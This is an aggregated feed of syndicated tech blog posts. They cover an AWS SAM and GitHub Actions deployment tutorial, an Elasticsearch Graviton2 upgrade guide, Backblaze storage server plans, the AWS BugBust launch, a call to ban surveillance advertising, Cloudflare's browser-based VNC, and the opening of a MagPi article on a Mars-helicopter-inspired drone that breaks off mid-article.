This post is written by Gopi Krishnamurthy, Senior Solutions Architect.

Continuous integration and continuous deployment (CI/CD) is one of the major DevOps components. This allows you to build, test, and deploy your applications rapidly and reliably, while improving quality and reducing time to market.

GitHub is an AWS Partner Network (APN) with the AWS DevOps Competency. GitHub Actions is a GitHub feature that allows you to automate tasks within your software development lifecycle. You can use GitHub Actions to run a CI/CD pipeline to build, test, and deploy software directly from GitHub.

The AWS Serverless Application Model (AWS SAM) is an open-source framework for building serverless applications. It provides shorthand syntax to express functions, APIs, databases, and event source mappings. With a few lines per resource, you can define the application you want and model it using YAML.

During deployment, AWS SAM transforms and expands the AWS SAM syntax into AWS CloudFormation syntax, enabling you to build serverless applications faster. The AWS SAM CLI allows you to build, test, and debug applications locally, defined by AWS SAM templates. You can also use the AWS SAM CLI to deploy your applications to AWS. For AWS SAM example code, see the serverless patterns collection.

In this post, you learn how to create a sample serverless application using AWS SAM. You then use GitHub Actions to build, and deploy the application in your AWS account.

New GitHub action setup-sam

A GitHub Actions runner is the application that runs a job from a GitHub Actions workflow. You can use a GitHub hosted runner, which is a virtual machine hosted by GitHub with the runner application installed. You can also host your own runners to customize the environment used to run jobs in your GitHub Actions workflows.

AWS has released a GitHub action called setup-sam to install AWS SAM, which is pre-installed on GitHub hosted runners. You can use this action to install a specific, or the latest AWS SAM version.

This demo uses AWS SAM to create a small serverless application using one of the built-in templates. When the code is pushed to GitHub, a GitHub Actions workflow triggers a GitHub CI/CD pipeline. This builds, and deploys your code directly from GitHub to your AWS account.

Prerequisites

  1. A GitHub account: This post assumes you have the required permissions to configure GitHub repositories, create workflows, and configure GitHub secrets.
  2. Create a new GitHub repository and clone it to your local environment. For this example, create a repository called github-actions-with-aws-sam.
  3. An AWS account with permissions to create the necessary resources.
  4. Install AWS Command Line Interface (CLI) and AWS SAM CLI locally. This is separate from using the AWS SAM CLI in a GitHub Actions runner. If you use AWS Cloud9 as your integrated development environment (IDE), AWS CLI and AWS SAM are pre-installed.
  5. Create an Amazon S3 bucket in your AWS account to store the build package for deployment.
  6. An AWS user with access keys, which the GitHub Actions runner uses to deploy the application. The user also write requires access to the S3 bucket.

Creating the AWS SAM application

You can create a serverless application by defining all required resources in an AWS SAM template. AWS SAM provides a number of quick-start templates to create an application.

  1. From the CLI, open a terminal, navigate to the parent of the cloned repository directory, and enter the following:
  2. sam init -r python3.8 -n github-actions-with-aws-sam --app-template "hello-world"
  3. When asked to select package type (zip or image), select zip.

This creates an AWS SAM application in the root of the repository named github-actions-with-aws-sam, using the default configuration. This consists of a single AWS Lambda Python 3.8 function invoked by an Amazon API Gateway endpoint.

To see additional runtimes supported by AWS SAM and options for sam init, enter sam init -h.

Local testing

AWS SAM allows you to test your applications locally. AWS SAM provides a default event in events/event.json that includes a message body of {\"message\": \"hello world\"}.

    1. Invoke the HelloWorldFunction Lambda function locally, passing the default event:
    2. sam local invoke HelloWorldFunction -e events/event.json
    3. The function response is:
    4. {"message": "hello world"}

    5. Test the API Gateway functionality in front of the Lambda function by first starting the API locally:
    6. sam local start-api
    7. AWS SAM launches a Docker container with a mock API Gateway endpoint listening on localhost:3000.
    8. Use curl to call the hello API:
    curl http://127.0.0.1:3000/hello

    The API response should be:

    {"message": "hello world"}

    Creating the sam-pipeline.yml file

    GitHub CI/CD pipelines are configured using a YAML file. This file configures what specific action triggers a workflow, such as push on main, and what workflow steps are required.

    In the root of the repository containing the files generated by sam init, create the directory: .github/workflows.

    1. Create a new file called sam-pipeline.yml under the .github/workflows directory.
    2. sam-pipeline.yml file

      sam-pipeline.yml file

    3. Edit the sam-pipeline.yml file and add the following:
    4. on:
        push:
          branches:
            - main
      jobs:
        build-deploy:
          runs-on: ubuntu-latest
          steps:
            - uses: actions/checkout@v2
            - uses: actions/setup-python@v2
            - uses: aws-actions/setup-sam@v1
            - uses: aws-actions/configure-aws-credentials@v1
              with:
                aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
                aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
                aws-region: ##region##
            # sam build 
            - run: sam build --use-container
      
      # Run Unit tests- Specify unit tests here 
      
      # sam deploy
            - run: sam deploy --no-confirm-changeset --no-fail-on-empty-changeset --stack-name sam-hello-world --s3-bucket ##s3-bucket## --capabilities CAPABILITY_IAM --region ##region## 
      
    5. Replace ##s3-bucket## with the name of the S3 bucket previously created to store the deployment package.
    6. Replace both ##region## with your AWS Region.

    The configuration triggers the GitHub Actions CI/CD pipeline when code is pushed to the main branch. You can amend this if you are using another branch. For a full list of supported events, refer to GitHub documentation page.

    You can further customize the sam build –use-container command if necessary. By default the Docker image used to create the build artifact is pulled from Amazon ECR Public. The default Python 3.8 image in this example is based on the language specified during sam init. To pull a different container image, use the --build-image option as specified in the documentation.

    The AWS CLI and AWS SAM CLI are installed in the runner using the GitHub action setup-sam. To install a specific version, use the version parameter.

    uses: aws-actions/setup-sam@v1
    with:
      version: 1.23.0

    As part of the CI/CD process, we recommend you scan your code for quality and vulnerabilities in bundled libraries. You can find these security offerings from our AWS Lambda Technology Partners.

    Configuring AWS credentials in GitHub

    The GitHub Actions CI/CD pipeline requires AWS credentials to access your AWS account. The credentials must include AWS Identity and Access Management (IAM) policies that provide access to Lambda, API Gateway, AWS CloudFormation, S3, and IAM resources.

    These credentials are stored as GitHub secrets within your GitHub repository, under Settings > Secrets. For more information, see “GitHub Actions secrets”.

    In your GitHub repository, create two secrets named AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY and enter the key values. We recommend following IAM best practices for the AWS credentials used in GitHub Actions workflows, including:

    • Do not store credentials in your repository code. Use GitHub Actions secrets to store credentials and redact credentials from GitHub Actions workflow logs.
    • Create an individual IAM user with an access key for use in GitHub Actions workflows, preferably one per repository. Do not use the AWS account root user access key.
    • Grant least privilege to the credentials used in GitHub Actions workflows. Grant only the permissions required to perform the actions in your GitHub Actions workflows.
    • Rotate the credentials used in GitHub Actions workflows regularly.
    • Monitor the activity of the credentials used in GitHub Actions workflows.

    Deploying your application

    Add all the files to your local git repository, commit the changes, and push to GitHub.

    git add .
    git commit -am "Add AWS SAM files"
    git push

    Once the files are pushed to GitHub on the main branch, this automatically triggers the GitHub Actions CI/CD pipeline as configured in the sam-pipeline.yml file.

    The GitHub actions runner performs the pipeline steps specified in the file. It checks out the code from your repo, sets up Python, and configures the AWS credentials based on the GitHub secrets. The runner uses the GitHub action setup-sam to install AWS SAM CLI.

    The pipeline triggers the sam build process to build the application artifacts, using the default container image for Python 3.8.

    sam deploy runs to configure the resources in your AWS account using the securely stored credentials.

    To view the application deployment progress, select Actions in the repository menu. Select the workflow run and select the job name build-deploy.

    GitHub Actions progress

    GitHub Actions progress

    If the build fails, you can view the error message. Common errors are:

    • Incompatible software versions such as the Python runtime being different from the Python version on the build machine. Resolve this by installing the proper software versions.
    • Credentials could not be loaded. Verify that AWS credentials are stored in GitHub secrets.
    • Ensure that your AWS account has the necessary permissions to deploy the resources in the AWS SAM template, in addition to the S3 deployment bucket.

    Testing the application

    1. Within the workflow run, expand the Run sam deploy section.
    2. Navigate to the AWS SAM Outputs section. The HelloWorldAPI value shows the API Gateway endpoint URL deployed in your AWS account.
    AWS SAM outputs

    AWS SAM outputs

  1. Use curl to test the API:
curl https://<api-id>.execute-api.us-east-1.amazonaws.com/Prod/hello/

The API response should be:
{"message": "hello world"}

Cleanup

To remove the application resources, navigate to the CloudFormation console and delete the stack. Alternatively, you can use an AWS CLI command to remove the stack:

aws cloudformation delete-stack --stack-name sam-hello-world

Empty, and delete the S3 deployment bucket.

Conclusion

GitHub Actions is a GitHub feature that allows you to run a CI/CD pipeline to build, test, and deploy software directly from GitHub. AWS SAM is an open-source framework for building serverless applications.

In this post, you use GitHub Actions CI/CD pipeline functionality and AWS SAM to create, build, test, and deploy a serverless application. You use sam init to create a serverless application and tested the functionality locally. You create a sam-pipeline.yml file to define the pipeline steps for GitHub Actions.

The GitHub action setup-sam installed AWS SAM on the GitHub hosted runner. The GitHub Actions workflow uses sam build to create the application artifacts and sam deploy to deploy them to your AWS account.

For more serverless learning resources, visit https://serverlessland.com.

Increase Amazon Elasticsearch Service performance by upgrading to Graviton2

Post Syndicated from Zachariah Elliott original https://aws.amazon.com/blogs/big-data/increase-amazon-elasticsearch-service-performance-by-upgrading-to-graviton2/

Amazon Elasticsearch Service (Amazon ES) supports multiple instance types based on your use case. In 2021, AWS announced general purpose (M6g), compute optimized (C6g), and memory optimized (R6g, R6gd) instance types for Amazon ES version 7.9 or later powered by AWS Graviton2 processors, which delivers a major leap in capabilities and better price/performance improvement over previous generation instances.

Graviton2 instances are built using custom silicon designed by Amazon. These instances are Amazon-designed hardware and software innovations that enable the delivery of efficient, flexible, and secure cloud services with isolated multi-tenancy, private networking, and fast local storage. You can launch Graviton2 instances via the Amazon ES console, the AWS Command Line Interface (AWS CLI), AWS API, AWS CloudFormation, or the AWS Cloud Development Kit (AWS CDK). You can change your existing Amazon ES instance types to Graviton2 using a blue/green deployment process, which minimizes downtime and maintains the original environment in the event of unsuccessful deployments.

In this post, we review prerequisites and considerations to upgrade your existing Amazon ES instances to Graviton2 with minimal downtime.

Why move to Graviton2?

The following are some of the reasons you should move to Graviton2:

  • You can enjoy up to 38% improvement in indexing throughput compared to the corresponding x86-based counterparts
  • The Graviton2 instance family provides up to 50% reduction in indexing latency, and up to 30% improvement in query performance when compared to the current generation (M5, C5, R5)
  • Amazon ES Graviton2 instances provide up to 44% price/performance improvement over previous generation instances
  • Graviton2 instances include support for all recently launched features like encryption at rest and in flight, role-based access control, cross-cluster search, Auto-Tune, Trace Analytics, Kibana Reporting, and UltraWarm

Solution overview

For this post, let’s consider a use case in which we have an Amazon ES cluster running version 7.4 with three data nodes and two primary nodes.

As a general best practice, we recommend testing the process in a non-production environment followed by validation tests to make sure everything is configured and operating as per your expectations before making changes to the production environment. We also recommend creating a snapshot of your cluster before performing upgrades or modifying the instance type to minimize the risk of data loss.

In this post, we walk you through the following steps:

  1. Upgrade the Amazon ES cluster (if needed):
    1. Determine if the current cluster version meets the minimum required version (7.9 or later) for moving to Graviton2.
    2. Upgrade the Amazon ES domain to the required minimum version.
  2. Modify the instance type of your cluster nodes.
  3. Confirm that your applications work correctly with the upgraded cluster.
  4. Roll back to the previous instance types if compatibility issues are discovered.

Upgrade Amazon ES versions

To take advantage of Graviton2-based Amazon ES instances, your cluster must be running Amazon ES version 7.9 and above and service software R20210331 or later (as of this post). For the latest updates of this information, see Supported instance types in Amazon Elasticsearch Service. For upgrade considerations, compatibilities, and instructions, see Upgrading Elasticsearch.

For our use case, our cluster is running version 7.4. We can confirm the version via the AWS CLI or Amazon ES console, as in the following screenshot.

To upgrade your domain, choose Upgrade domain on the Actions menu. You can then choose what version to upgrade to, or verify your cluster can be upgraded. The upgrade process takes some time depending on the size of your cluster.

If you prefer to use the AWS CLI, you can perform the same steps. To get a list of all valid upgrade targets for a current version using the AWS CLI, use the describe-elasticsearch-domain command.

The following describe-elasticsearch-domain example provides configuration details for a given domain:

aws es describe-elasticsearch-domain \
    --domain-name demo

If the cluster version is less than 7.9, use the upgrade-elasticsearch-domain command to upgrade your domain:

aws es upgrade-elasticsearch-domain \
--domain-name demo
--target-version 7.9

You can track the progress of the Amazon ES domain upgrade using API calls to Amazon ES. For more information, see Why is my Amazon Elasticsearch Service domain upgrade taking so long?

Modify instances

At the time of writing, you can’t mix x86 and Graviton2-based Amazon ES instances with the primary and data nodes. As such, both data nodes and primary nodes are modified at the same time. To modify your nodes, complete the following steps:

  1. On the Amazon ES console, go to the domain you want to upgrade.
  2. Choose Edit domain.

  1. In the Data nodes section, for Instance type, change your data nodes to Graviton 2 instance types. In our case, we upgrade from r5.large.elasticsearch to r6g.large.elasticsearch.

  1. In the Dedicated master nodes section, for Instance type, change your dedicated primary nodes to Graviton 2 instance types. In our case, we upgrade from r5.large.elasticsearch to r6g.large.elasticsearch.

  1. Choose Submit.

The cluster goes into a processing state. During this time, you can monitor the Cluster health tab to see your number of nodes increase. In our case, our cluster has two dedicated primary nodes and three data nodes (five total).

During deployment, Amazon ES performs a blue/green deployment. This ensures any errors encountered during modification can be rolled back. You can continue to use the cluster during this time, however there may be a brief service interruption when the cluster switches to the new dedicated primary nodes. During blue/green deployment, you’re charged for both instance types, and then only the new instance type going forward.

After the modification finishes successfully, you can verify both the primary and data nodes are using Graviton2 instances.

Validate and confirm the application works correctly

You can now validate Amazon ES is performing as expected with your application. You can check the Cluster health tab for metrics related to cluster performance and observe if you’re not seeing the expected performance.

Perform rollback

In the rare scenario in which issues are discovered with the Graviton2-based Amazon ES cluster, such as application compatibility or data issues, you can perform the same steps to change the cluster back to the original node type.

Summary

This post shared a step-by-step guide to migrate your Amazon ES cluster to Graviton2-based nodes, as well as some key considerations when modifying your cluster. We also talked about how to upgrade your cluster to the latest version of Amazon ES to take advantage of Graviton 2, as well as other features such as UltraWarm and cold storage. As always, make sure you fully test compatibility with your application and these newer versions of Amazon ES, and per best practices, always perform upgrades in a lower environment before making these changes in a production environment.

Additional resources

For more information, see the following:


About the Authors

Zachariah Elliott works as a Solutions Architect focusing on EdTech at AWS. He is passionate about helping customers build Well-Architected solutions on AWS. He is also part of the IoT Subject Matter Expert community at AWS and loves helping customers develop unique IoT-based solutions.

 

Pranusha Manchala is a Solutions Architect at AWS who works with education companies. She has worked with many EdTech customers and provided them with architectural guidance for building highly scalable and cost-optimized applications on AWS. She found her interests in machine learning and started to dive deep into this technology. She enjoys cooking, baking, and outdoor activities in her free time.

The Next Backblaze Storage Pod

Post Syndicated from original https://www.backblaze.com/blog/next-backblaze-storage-pod/

Backblaze Storage Pod 7?

In September of 2019, we celebrated the 10-year anniversary of open-sourcing the design of our beloved Storage Pods. In that post, we contemplated the next generation Backblaze Storage Pod and outlined some of the criteria we’d be considering as we moved forward with Storage Pod 7.0 or perhaps a third-party vendor.

Since that time, the supply chain for the commodity parts we use continues to reinvent itself, the practice of just-in-time inventory is being questioned, the marketplace for high-density storage servers continues to mature, and the continuing cost effectiveness of scaling the manufacturing and assembly of Storage Pods has proved elusive. A lot has changed.

The Next Storage Pod

As we plan for the next 10 years of providing our customers with astonishingly easy to use cloud storage at a fair price, we need to consider all of these points and more. Follow along as we step through our thought process and let you know what we’re thinking—after all, it’s your data we are storing, and you have every right to know how we plan to do it.

Storage Pod Realities

You just have to look at the bill of materials for Storage Pod 6.0 to know that we use commercially available parts wherever possible. Each Storage Pod has 25 different parts from 15 different manufacturers/vendors, plus the red chassis, and, of course, the hard drives. That’s a trivial number of parts and vendors for a hardware company, but stating the obvious, Backblaze is a software company.

Still, each month we currently build 60 or so new Storage Pods. So, each month we’d need 60 CPUs, 720 SATA cables, 120 power supplies, and so on. Depending on the part, we could order it online or from a distributor or directly from the manufacturer. Even before COVID-19 we found ourselves dealing with parts that would stock out or be discontinued. For example, since Storage Pod 6.0 was introduced, we’ve had three different power supply models be discontinued.

For most of the parts, we actively try to qualify multiple vendors/models whenever we can. But this can lead to building Storage Pods that have different performance characteristics (e.g. different CPUs, different motherboards, and even different hard drives). When you arrange 20 Storage Pods into a Backblaze Vault, you’d like to have 20 systems that are the same to optimize performance. For standard parts like screws, you can typically find multiple sources, but for a unique part like the chassis, you have to arrange an alternate manufacturer.

With COVID-19, the supply chain was very hard to navigate to procure the various components of a Storage Pod. It was normal for purchase orders to be cancelled, items to stock out, shipping dates to slip, and even prices to be renegotiated on the fly. Our procurement team was on top of this from the beginning, and we got the parts we needed. Still, it was a challenge as many sources were limiting capacity and shipping nearly everything they had to their larger customers like Dell and Supermicro, who were first in line.

A visual representation of how crazy the supply chain is.
Supply chain logistics aren’t getting less interesting.

Getting Storage Pods Built

When we first introduced Storage Pods, we were the only ones who built them. We would have the chassis constructed and painted, then we’d order all the parts and assemble the units at our data center. We built the first 20 or so this way. At that point, we decided to outsource the assembly process to a contract manufacturer. They would have a sheet metal fabricator construct and paint the chassis, and the contract manufacturer would order and install all the parts. The complete Storage Pod was then shipped to us for testing.

Over the course of the last 12 years, we’ve had multiple contract manufacturers. Why? There are several reasons, but they start with the fact that building 20, 40, or even 60 Storage Pods a month is not a lot of work for most contract manufacturers—perhaps five days a month at most. If they dedicate a line to Storage Pods, that’s a lot of dead time for the line. Yet, Storage Pod assembly doesn’t lend itself to being flexed into a line very well, as the Storage Pods are bulky and the assembly process is fairly linear versus modular.

an array of parts that get assembled to create a storage pod

In addition, we asked the contract manufacturers to acquire and manage the Storage Pod parts. For a five-day-a-month project, their preferred process is to have enough parts on hand for each monthly run. But we liked to buy in bulk to lower our cost, and some parts like backplanes had high minimum order quantities. This meant someone had to hold inventory. Over time, we took on more and more of this process, until we were ordering all the parts and having them shipped to the contract manufacturer monthly to be assembled. It didn’t end there.

As noted above, when the COVID-19 lockdown started, supply chain and assembly processes were hard to navigate. As a consequence, we started directing some of the fabricated Storage Pod chassis to be sent to us for assembly and testing. This hybrid assembly model got us back in the game of assembling Storage Pods—we had gone full circle. Yes, we are control freaks when it comes to our Storage Pods. That was a good thing when we were the only game in town, but a lot has changed.

The Marketplace Catches Up

As we pointed out in the 10-year anniversary Storage Pod post, there are plenty of other companies that are making high-density storage servers like our Storage Pod. At the time of that post, the per unit cost was still too high. That’s changed, and today high-density storage servers are generally cost competitive. But unit cost is only part of the picture as some of the manufacturers love to bundle services into the final storage server you receive. Some services are expected, like maintenance coverage, while others—like the requirement to only buy hard drives from them at a substantial markup—are non-starters. Still, over the next 10 years, we need to ensure we have the ability to scale our data centers worldwide and to be able to maintain the systems within. At the same time, we need to ensure that the systems are operational and available to meet or exceed our expectations and those of our customers, as well.

The Amsterdam Data Center

As we contemplated opening our data center in Amsterdam, we had a choice to make: use Storage Pods or use storage servers from another vendor. We considered shipping the 150-pound Storage Pods to Amsterdam or building them there as options. Both were possible, but each had their own huge set of financial and logistical hurdles along the way. The most straightforward path to get storage servers to the Amsterdam data center turned out to be Dell.

The process started by testing out multiple storage server vendors in our Phoenix data center. There is an entire testing process we have in place, which we’ll cover in another post, but we can summarize by saying the winning platform needed to be at least as performant and stable as our Storage Pods. Dell was the winner and from there we ordered two Backblaze Vaults worth of Dell servers for the Amsterdam data center.

The servers were installed, our data center techs were trained, repair metrics were established and tracked, and the systems went live. Since that time, we added another six Backblaze Vaults worth of servers. Overall, it has been a positive experience for everyone involved—not perfect, but filled with learnings we can apply going forward.

By the way, Dell was kind enough to make red Backblaze bezels for us, which we install on each of the quasi-Storage Pods. They charge us extra for them, of course, but some things are just worth it.

Backblaze Dell Server Face Plates
Faceplate on the quasi-Storage Pod.

Lessons Learned

The past couple of years, including COVID, have taught us a number of lessons we can take forward:

  1. We can use third-party storage servers to reliably deliver our cloud storage services to our customers.
  2. We don’t have to do everything. We can work with those vendors to ensure the equipment is maintained and serviced in a timely manner.
  3. We deepened our appreciation of having multiple sources/vendors for the hardware we use.
  4. We can use multiple third-party vendors to scale quickly, even if storage demand temporarily outpaces our forecasts.

Those points, taken together, have opened the door to using storage servers from multiple vendors. When we built our own Storage Pods, we achieved our cost savings from innovation and the use of commodity parts. We were competing against ourselves to lower costs. By moving forward with non-Backblaze storage servers, we will have the opportunity for the marketplace to compete for our business.

Are Storage Pods Dead?

Right after we introduced Storage Pod 1.0 to the world, we had to make a decision as to whether or not to make and sell Storage Pods in addition to our cloud-based services. We did make and sell a few Storage Pods—we needed the money—but we eventually chose software. We also decided to make our software hardware-agnostic. We could run on any reasonably standard storage server, so now that storage server vendors are delivering cost-competitive systems, we can use them with little worry.

So the question is: Will there ever be a Storage Pod 7.0 and beyond? We want to say yes. We’re still control freaks at heart, meaning we’ll want to make sure we can make our own storage servers so we are not at the mercy of “Big Server Inc.” In addition, we do see ourselves continuing to invest in the platform so we can take advantage of and potentially create new, yet practical ideas in the space (Storage Pod X anyone?). So, no, we don’t think Storage Pods are dead, they’ll just have a diverse group of storage server friends to work with.

Storage Pod Fun

Over the years we had some fun with our Storage Pods. Here are a few of our favorites.

Storage Pod Dominos: That’s all that needs to be said.

Building the Big “B”: How to build a “B” out of Storage Pods.

Crushing Storage Pods: Megabot meets Storage Pod, destruction ensues.

Storage Pod Museum: We saved all the various versions of Storage Pods.

Storage Pod Giveaway: Interviews from the day we gave away 200 Storage Pods.

Pick a Faceplate: We held a contest to let our readers choose the next Backblaze faceplate design.

The post The Next Backblaze Storage Pod appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

New – AWS BugBust: It’s Game Over for Bugs

Post Syndicated from Martin Beeby original https://aws.amazon.com/blogs/aws/new-aws-bugbust-its-game-over-for-bugs/

Today, we are launching AWS BugBust, the world’s first global challenge to fix one million bugs and reduce technical debt by over $100 million.

You might have participated in a bug bash before. Many of the software companies where I’ve worked (including Amazon) run them in the weeks before launching a new product or service. AWS BugBust takes the concept of a bug bash to a new level.

AWS BugBust allows you to create and manage private events that will transform and gamify the process of finding and fixing bugs in your software. It includes automated code analysis, built-in leaderboards, custom challenges, and rewards. AWS BugBust fosters team building and introduces some friendly competition into improving code quality and application performance. What’s more, your developers can take part in the world’s largest code challenge, win fantastic prizes, and receive kudos from their peers.

Behind the scenes, AWS BugBust uses Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler. These developer tools use machine learning and automated reasoning to find bugs in your applications. These bugs are then available for your developers to claim and fix. The more bugs a developer fixes, the more points the developer earns. A traditional bug bash requires developers to find and fix bugs manually. With AWS BugBust, developers get a list of bugs before the event begins so they can spend the entire event focused on fixing them.

Fix Your Bugs and Earn Points
As a developer, each time you fix a bug in a private event, points are allocated and added to the global leaderboard. Don’t worry: Only your handle (profile name) and points are displayed on the global leaderboard. Nobody can see your code or details about the bugs that you’ve fixed.

As developers reach significant individual milestones, they receive badges and collect exclusive prizes from AWS, for example, if they achieve 100 points they will win an AWS BugBust T-shirt and if they earn 2,000 points they will win an AWS BugBust Varsity Jacket. In addition, on the 30th of September 2021, the top 10 developers on the global leaderboard will receive a ticket to AWS re:Invent.

Create an Event
To show you how the challenge works, I’ll create a private AWS BugBust event. In the CodeGuru console, I choose Create BugBust event.

Under Step 1- Rules and scoring, I see how many points are awarded for each type of bug fix. Profiling groups are used to determine performance improvements after the players submit their improved solutions.

In Step 2, I sign in to my player account. In Step 3, I add event details like name, description, and start and end time.

I also enter details about the first-, second-, and third-place prizes. This information will be displayed to players when they join the event.

After I have reviewed the details and created the event, my event dashboard displays essential information, I can also import work items and invite players.

I select the Import work items button. This takes me to the Import work items screen where I choose to Import bugs from CodeGuru Reviewer and profiling groups from CodeGuru Profiler. I choose a repository analysis from my account and AWS BugBust imports all the identified bugs for players to claim and fix. I also choose several profiling groups that will be used by AWS BugBust.

Now that my event is ready, I can invite players. Players can now sign into a player portal using their player accounts and start claiming and fixing bugs.

Things to Know
Amazon CodeGuru currently supports Python and Java. To compete in the global challenge, your project must be written in one of these languages.

Pricing
When you create your first AWS BugBust event, all costs incurred by the underlying usage of Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler are free of charge for 30 days per AWS account. This 30 day free period applies even if you have already utilized the free tiers for Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler. You can create multiple AWS BugBust events within the 30-day free trial period. After the 30-day free trial expires, you will be charged for Amazon CodeGuru Reviewer and Amazon CodeGuru Profiler based on your usage in the challenge. See the Amazon CodeGuru Pricing page for details.

Available Today
Starting today, you can create AWS BugBust events in the Amazon CodeGuru console in the US East (N. Virginia) Region. Start planning your AWS BugBust today.

— Martin

Banning Surveillance-Based Advertising

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/06/banning-surveillance-based-advertising.html

The Norwegian Consumer Council just published a fantastic new report: “Time to Ban Surveillance-Based Advertising.” From the Introduction:

The challenges caused and entrenched by surveillance-based advertising include, but are not limited to:

  • privacy and data protection infringements
  • opaque business models
  • manipulation and discrimination at scale
  • fraud and other criminal activity
  • serious security risks

In the following chapters, we describe various aspects of these challenges and point out how today’s dominant model of online advertising is a threat to consumers, democratic societies, the media, and even to advertisers themselves. These issues are significant and serious enough that we believe that it is time to ban these detrimental practices.

A ban on surveillance-based practices should be complemented by stronger enforcement of existing legislation, including the General Data Protection Regulation, competition regulation, and the Unfair Commercial Practices Directive. However, enforcement currently consumes significant time and resources, and usually happens after the damage has already been done. Banning surveillance-based advertising in general will force structural changes to the advertising industry and alleviate a number of significant harms to consumers and to society at large.

A ban on surveillance-based advertising does not mean that one can no longer finance digital content using advertising. To illustrate this, we describe some possible ways forward for advertising-funded digital content, and point to alternative advertising technologies that may contribute to a safer and healthier digital economy for both consumers and businesses.

Press release. Press coverage.

I signed their open letter.

Browser VNC with Zero Trust Rules

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/browser-vnc-with-zero-trust-rules/

Browser VNC with Zero Trust Rules

Browser VNC with Zero Trust Rules

Starting today, we’re excited to share that you can now shift another traditional client-driven use case to a browser. Teams can now provide their users with a Virtual Network Computing (VNC) client fully rendered in the browser with built-in Zero Trust controls.

Like the SSH flow, this allows users to connect from any browser on any device, with no client software needed. The feature runs in every one of our data centers in over 200 cities around the world, bringing the experience closer to your end users. We also built the experience using Cloudflare Workers, to offer nearly instant start times. In the future we will support full auditability of user actions in their VNC and SSH sessions.

A quick refresher on VNC

VNC is a desktop sharing platform built on top of the Remote Frame Buffer protocol that allows for a GUI on any server. It is built to be platform-independent and provides an easy way for administrators to make interfaces available to users that are less comfortable with a command-line to work with a remote machine. Or to complete work better suited for a visual interface.

In my case, the most frequent reason I use VNC is to play games that have compatibility issues. Using a virtual machine to run a Windows Server was much cheaper than buying a new laptop.

In most business use cases, VNC isn’t used to play games, it’s driven by security or IT management requirements. VNC can be beneficial to create a “clean room” style environment for users to interact with secure information that cannot be moved to their personal machine.

How VNC is traditionally deployed

Typically, VNC deployments require software to be installed onto a user’s machine. This software allows a user to establish a VNC connection and render the VNC server’s GUI. This comes with challenges of operating system compatibility (remember how VNC was supposed to be platform independent?), security, and management overhead.

Managing software like a VNC viewer typically requires Mobile Device Management (MDM) software or users making individual changes to their machines. This is further complicated by contractors and external users requiring access via VNC.

Challenges with VNC deployments

VNC is often used to create an environment for a user to interact with sensitive data. However, it can be very difficult to monitor when a user makes a connection to a VNC server and then what they do during their session, without significant network configuration.

On top of the security concerns, software installed on a user’s machine, like a VNC viewer, is generally difficult to manage — think compatibility issues with operating systems, security updates, and many other problems.

Unlike SSH, where the majority of servers and clients predominantly use OpenSSH, there are numerous commercial and free VNC servers / clients in various states of quality and cost.

We wanted to fix this!

It was time for Browser VNC

One major challenge of rendering a GUI is latency — if a user’s mouse or keystrokes are slow, the experience is almost unusable. Using Cloudflare Tunnel, we can deliver the VNC connection at our edge, meaning we’re less than <50 ms away from 99% of Internet users.

To do this we built a full VNC viewer implementation that runs in a web browser. Something like this would normally require running a server-side TCP → WebSocket proxy (eg. websockify since TCP connections are not natively supported in browsers today). Since we already have exactly this with cloudflared + Cloudflare Tunnel, we can connect to existing TCP tunnels and provide an entirely in-browser VNC experience. Because the server-side proxy happens at the TCP level, the VNC session is end-to-end encrypted between the web client and the VNC server within your network.

Browser VNC with Zero Trust Rules

Once we establish a connection, we use noVNC to render any VNC server natively in the browser.

All of this is delivered using Cloudflare Workers. We were able to build this entire experience on our serverless platform to render the VNC experience at our edge.

The final step is to authenticate the traffic going to the Tunnel established with your VNC server. For this, we can use Cloudflare Access, as it allows us to verify a user’s identity and enforce additional security checks. Once a user is properly authenticated, they are presented with a cookie that is then checked on every request made to the VNC server.

Browser VNC with Zero Trust Rules

And then a user can use their VNC terminal!

Browser VNC with Zero Trust Rules

Why Browser Based is the future

First and foremost, a browser-based experience is straightforward for users. All they need is an Internet connection and URL to access their SSH and VNC instances. Previously they needed software like a puTTY client and RealVNC.

Legacy applications, including VNC servers, serve as another attack vector for malicious users because they are difficult to monitor and keep patched with security updates. VNC based in the browser means that we can push security updates instantly. As well as taking advantage of built-in security features of modern browsers (e.g. chromium sandboxing).

Visibility is another major improvement. In future releases, we will support screen recording and network request logging to provide detailed information on exactly what was completed during a VNC session. We already provide clear logs on any time a user accesses their VNC or SSH server via the browser.

Browser VNC with Zero Trust Rules

We’re just getting started!

Browser VNC is available now in every Cloudflare for Teams plan. You can get started for up to 50 users at no cost here.

Soon we’ll be announcing our plans to support additional protocols only available in on-prem deployments. Let us know in the Community if there are particular protocols you would like us to consider!

If you have questions about getting started, feel free to post in the community. If you would like to get started today, follow our step-by-step tutorial.

‘Epigone drone’ pays homage to NASA’s Mars Helicopter | The MagPi #107

Post Syndicated from Rosie Hattersley original https://www.raspberrypi.org/blog/epigone-drone-pays-homage-to-nasas-mars-helicopter-the-magpi-107/

Inspired by NASA’s attempt to launch a helicopter on Mars, one maker made an Earth-bound one of her own. And she tells Rosie Hattersley all about it in the latest issue of The MagPi Magazine, out now.

Epigone drone hero
To avoid being swiped by the drone’s rotors, the Raspberry Pi 4, which uses NASA’s especially written F Prime code for telemetry, had to be positioned very carefully

Like millions of us, in April Avra Saslow watched with bated breath as NASA’s Perseverance rover touched down on the surface of Mars. 

Like most of us, Avra knew all about the other ground-breaking feat being trialled alongside Perseverance: a helicopter launch called Ingenuity, that was to be the first flight on another planet – “a fairly lofty goal”, says Avra, since “the atmosphere on Mars is 60 times less dense than Earth’s.” 

With experience of Raspberry Pi-based creations, Avra was keen to emulate Ingenuity back here on earth.

Project maker holding their creation
Avra’s videographer colleague lent her the drone that enables Epigone to achieve lift-off

NASA chose to use open-source products and use commercially available parts for its helicopter build. It just so happened that Avra had recently begun working at SparkFun, a Colorado-based reseller that sells the very same Garmin LIDAR-Lite v3 laser altimeter that NASA’s helicopter is based on. “It’s a compact optical distance measurement sensor that gives the helicopter ‘eyes’ to see how far it hovers above ground,” Avra explains.

